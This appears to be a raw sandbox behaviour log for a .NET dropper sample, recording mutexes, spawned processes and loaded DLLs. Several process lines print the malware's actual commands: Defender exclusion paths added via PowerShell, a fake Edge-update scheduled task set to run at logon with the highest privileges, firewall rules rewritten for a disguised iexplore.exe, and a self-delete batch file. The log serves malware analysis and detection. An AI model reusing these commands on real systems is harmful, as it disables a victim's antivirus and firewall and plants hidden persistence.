Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess280
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:772:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | File created: C:\Users\user\AppData\Local\Temp\selfdelete.bat
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\selfdelete.bat""
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | ReversingLabs: Detection: 62%
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe "C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe"
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | Process created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\ProgramData\Microsoft\Bound.exe "C:\ProgramData\Microsoft\Bound.exe"
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=in program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 280 -s 1376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=in "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\selfdelete.bat""
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Process created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=out program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=out "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Inbound' dir=in action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Inbound" dir=in action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Outbound' dir=out action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Outbound" dir=out action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | Section loaded: mscoree.dll
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | Section loaded: apphelp.dll
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | Section loaded: version.dll
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: propsys.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: edputil.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: urlmon.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: iertutil.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: srvcli.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: netutils.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: sspicli.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: wintypes.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: appresolver.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: slc.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: userenv.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: sppc.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: apphelp.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: mscoree.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: apphelp.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: version.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
